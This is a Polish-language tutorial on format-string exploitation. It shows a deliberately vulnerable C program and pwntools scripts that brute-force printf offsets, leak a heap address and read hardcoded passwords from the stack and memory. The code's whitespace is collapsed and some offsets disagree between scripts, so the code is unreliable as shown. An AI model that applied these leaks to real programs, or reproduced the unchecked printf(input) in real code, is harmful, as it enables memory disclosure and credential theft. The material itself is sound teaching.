from pwn import*p =process('./fs-read')payload =f"%11$s|||||".encode()payload +=p64(0x00400000)p.sendline(payload)log.info(p.clean())
Offset wynosi 11, ponieważ ustawienie kilku A i brute-forcing z pętlą offsetów od 0 do 50 wykazało, że przy offsetcie 11 i z 5 dodatkowymi znakami (rurki | w naszym przypadku), możliwe jest kontrolowanie pełnego adresu.
Użyłem %11$p z wypełnieniem, aż adres był cały 0x4141414141414141
Ładunek formatu jest PRZED adresem, ponieważ printf przestaje czytać po bajcie null, więc jeśli wyślemy adres, a potem łańcuch formatu, printf nigdy nie dotrze do łańcucha formatu, ponieważ bajt null zostanie znaleziony wcześniej
Wybrany adres to 0x00400000, ponieważ to tam zaczyna się binarka (brak PIE)
Odczytaj hasła
#include<stdio.h>#include<string.h>char bss_password[20] ="hardcodedPassBSS"; // Password in BSSintmain() {char stack_password[20] ="secretStackPass"; // Password in stackchar input1[20], input2[20];printf("Enter first password: ");scanf("%19s", input1);printf("Enter second password: ");scanf("%19s", input2);// Vulnerable printfprintf(input1);printf("\n");// Check both passwordsif (strcmp(input1, stack_password)==0&&strcmp(input2, bss_password)==0) {printf("Access Granted.\n");} else {printf("Access Denied.\n");}return0;}
Skompiluj to za pomocą:
clang-ofs-readfs-read.c-Wno-format-security
Odczyt z stosu
stack_password będzie przechowywane w stosie, ponieważ jest to zmienna lokalna, więc wystarczy nadużyć printf, aby pokazać zawartość stosu. To jest exploit do BF pierwszych 100 pozycji, aby wyciekły hasła ze stosu:
from pwn import*for i inrange(100):print(f"Try: {i}")payload =f"%{i}$s\na".encode()p =process("./fs-read")p.sendline(payload)output = p.clean()print(output)p.close()
W obrazie widać, że możemy wycieknąć hasło ze stosu na 10 pozycji:
Odczyt danych
Uruchamiając ten sam exploit, ale z %p zamiast %s, możliwe jest wyciekanie adresu sterty ze stosu na %25$p. Co więcej, porównując wyciekły adres (0xaaaab7030894) z pozycją hasła w pamięci w tym procesie, możemy uzyskać różnicę adresów:
Teraz nadszedł czas, aby znaleźć sposób na kontrolowanie 1 adresu na stosie, aby uzyskać do niego dostęp z drugiej podatności na format string:
from pwn import*defleak_heap(p):p.sendlineafter(b"first password:", b"%5$p")p.recvline()response = p.recvline().strip()[2:] #Remove new line and "0x" prefixreturnint(response, 16)for i inrange(30):p =process("./fs-read")heap_leak_addr =leak_heap(p)print(f"Leaked heap: {hex(heap_leak_addr)}")password_addr = heap_leak_addr -0x126aprint(f"Try: {i}")payload =f"%{i}$p|||".encode()payload +=b"AAAAAAAA"p.sendline(payload)output = p.clean()print(output.decode("utf-8"))p.close()
I można zauważyć, że w try 14 z użytym przekazaniem możemy kontrolować adres:
Exploit
from pwn import*p =process("./fs-read")defleak_heap(p):# At offset 25 there is a heap leakp.sendlineafter(b"first password:", b"%25$p")p.recvline()response = p.recvline().strip()[2:] #Remove new line and "0x" prefixreturnint(response, 16)heap_leak_addr =leak_heap(p)print(f"Leaked heap: {hex(heap_leak_addr)}")# Offset calculated from the leaked position to the possition of the pass in memorypassword_addr = heap_leak_addr +0x1f7bcprint(f"Calculated address is: {hex(password_addr)}")# At offset 14 we can control the addres, so use %s to read the string from that addresspayload =f"%14$s|||".encode()payload +=p64(password_addr)p.sendline(payload)output = p.clean()print(output)p.close()